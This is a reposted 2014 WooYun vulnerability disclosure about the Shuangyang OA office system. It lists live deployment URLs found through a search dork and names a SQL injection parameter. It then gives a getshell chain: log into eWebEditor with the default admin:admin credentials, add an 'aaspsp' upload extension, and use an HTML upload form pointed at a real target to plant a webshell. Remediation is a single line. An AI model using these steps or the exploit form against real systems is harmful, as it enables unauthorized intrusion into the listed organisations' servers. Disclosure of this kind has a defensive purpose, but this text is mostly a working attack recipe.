记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

双杨OA又一处SQL注入+Getshell+官网再次中招+证明其通用性

2014-07-09 18:20

1.先证明其通用性

搜索引擎搜索“首次使用请先点击安装”即可找到部分案例,

举例:

http://oa.syc.com.cn/OA/index/index.aspx

http://xinhuachongming.com.cn/DSOA_TY/index/index.aspx

http://221.199.203.230:9001/dsoa/index/index.aspx

http://180.166.56.106/dsoa/index/index0.aspx

http://sd.tobacco.com.cn/dsoa_kgj_web/index/index0.aspx



2.SQL注入

上次的注射点在/help/HelpShowTip.aspx?helpid=1

这次又发现注射点help/HelpShow.aspx?id=1

比如,http://oa.syc.com.cn/OA/help/HelpShow.aspx?id=1

证明图略。



3.Getshell

该OA使用eWebEditor 2.8.0

比如,访问http://oa.syc.com.cn/OA/ewebeditor/admin_login.asp,以默认admin:admin登陆,修改样式,记下样式名称,比如“s_exampleremote”,在“其它类型”中添加“aaspsp”,

1.png



提交,

再使用如下exp:

<HTML>

<HEAD>

<meta charset="utf-8" />

<TITLE>Getshell</TITLE>

</head>

<body>

<form action="http://oa.syc.com.cn/OA/ewebeditor/upload.asp?action=save&type=FILE&style=s_exampleremote" method=post name=myform enctype="multipart/form-data">

<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">

<input type=hidden name=originalfile value="">

<input type=submit value="提交">

</form>

</body>

</html>



随后于“上传文件管理”中找到刚才上传的webshell,

Game Over



4.

-Why not dig a little deeper?

-Nah,no need for that.

漏洞证明:

You just saw that, didn't you, cncert?

修复方案:

Fix it right away.

C'mon, man, you guys gave me just 11rank for WooYun-2014-55573?

知识来源: www.wooyun.org/bugs/wooyun-2014-056570

阅读:109828 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“双杨OA又一处SQL注入+Getshell+官网再次中招+证明其通用性”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词